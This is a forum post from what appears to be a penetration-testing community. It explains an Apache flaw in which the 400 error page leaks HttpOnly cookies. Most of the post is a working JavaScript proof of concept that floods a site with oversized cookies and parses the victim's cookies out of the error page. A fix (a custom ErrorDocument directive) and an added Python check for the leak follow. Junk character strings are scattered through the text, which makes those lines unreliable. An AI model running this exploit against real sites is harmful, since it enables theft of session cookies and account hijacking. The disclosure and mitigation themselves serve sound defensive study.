中国网络渗透测试联盟

Title: Apache HttpOnly Cookie XSS cross-site vulnerability

Author: admin    Time: 2013-4-19 19:15
Title: Apache HttpOnly Cookie XSS cross-site vulnerability
Many applications, including commercial and mature open-source CMS/article systems, set the HttpOnly attribute on their cookies to stop XSS from stealing user cookies: the attribute prevents JavaScript from reading the cookie directly, which reduces the impact of an XSS bug. The issue described here can be used to bypass that HttpOnly attribute.

Open a site in Chrome, press F12 to open the developer tools, switch to the Console, paste the following code and press Enter:
// http://www.exploit-db.com/exploits/18442/
function setCookies (good) {
    // Construct string for cookie value
    var str = "";
    for (var i = 0; i < 819; i++) {
        str += "x";
    }
    // Set cookies
    for (i = 0; i < 10; i++) {
        // Expire evil cookie
        if (good) {
            var cookie = "xss" + i + "=;expires=" + new Date(+new Date() - 1).toUTCString() + "; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss" + i + "=" + str + ";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();
    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content
            var content = xhr.responseText.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
            // match() returns null when the error page has no <pre> block
            if (content && content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object
                for (var i = 0; i < cookies.length; i++) {
                    var s_c = cookies[i].split('=', 2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
                // Unset malicious cookies
                setCookies(true);
                alert(JSON.stringify(cookie_dict));
            }
        }
    }
    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}
makeRequest();

You will then see the glorious 400 error response, with the cookie information echoed back inside it.

Download: https://gist.github.com/pilate/1955a1c28324d4724b7b/download
5 D2 Z! p1 f3 [4 C8 W
Fix:
6 G6 C# L) p* S9 `/ Z8 `) h
Apache officially provides four ways of handling errors (http://httpd.apache.org/docs/2.0/mod/core.html#errordocument), as follows:

In the event of a problem or error, Apache can be configured to do one of four things:

1. output a simple hardcoded error message
2. output a customized message
3. redirect to a local URL-path to handle the problem/error
4. redirect to an external URL to handle the problem/error
0 z8 {$ ^0 l3 J7 b; |" f
In testing, only method 2 works for 400 errors: with it, the response no longer contains the cookie content.
9 c1 |5 l1 n) ~& F
Apache configuration:

ErrorDocument 400 "security test"

Of course, upgrading Apache to the latest version also works :).
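To confirm that the ErrorDocument change actually stops the reflection, here is an added Python check (not from the original post or the exploit-db PoC) that applies the same `<pre>` / `Cookie:` parsing as the script above to two constructed 400 response bodies: one in the default Apache 2.2 error-page format and one after the fix. The bodies and cookie values are constructed samples, not captures from a real server.

```python
import re

# Constructed sample of the default Apache 2.2 400 page for an oversized
# request header; the offending Cookie header is echoed inside <pre>.
LEAKY_400_BODY = (
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
    "<html><head><title>400 Bad Request</title></head><body>\n"
    "<h1>Bad Request</h1>\n"
    "<p>Your browser sent a request that this server could not understand.<br />\n"
    "Size of a request header field exceeds server limit.<br />\n"
    "<pre>\nCookie: PHPSESSID=abc123; xss0=xxxx; xss1=xxxx\n</pre>\n"
    "</p></body></html>\n"
)

# Constructed body returned once `ErrorDocument 400 "security test"` is set.
FIXED_400_BODY = "security test"

# The padding cookies the PoC plants (xss0..xss9 = xxxx...) are noise, strip them.
PADDING_RE = re.compile(r"xss\d+=x+;?\s*")


def leaked_cookies(body):
    """Return {name: value} for cookies echoed in the <pre> block of a 400 page.

    An empty dict means the server did not reflect the Cookie header."""
    flat = re.sub(r"[\r\n]", "", body)
    m = re.search(r"<pre>(.*?)</pre>", flat)
    if not m:
        return {}
    echoed = m.group(1).strip()
    if not echoed.startswith("Cookie:"):
        return {}
    echoed = PADDING_RE.sub("", echoed[len("Cookie:"):])
    out = {}
    for pair in echoed.split(";"):
        pair = pair.strip()
        if "=" in pair:
            name, value = pair.split("=", 1)
            out[name.strip()] = value.strip()
    return out


def reflects_cookie_header(body):
    """True when the 400 page still exposes real (non-padding) cookies."""
    return bool(leaked_cookies(body))
```

Run it against the body your own server returns for an oversized Cookie header, before and after changing the ErrorDocument directive.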
' \" P5 L; {) ]  ^9 `+ z
Reference: http://httpd.apache.org/security/vulnerabilities_22.html

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2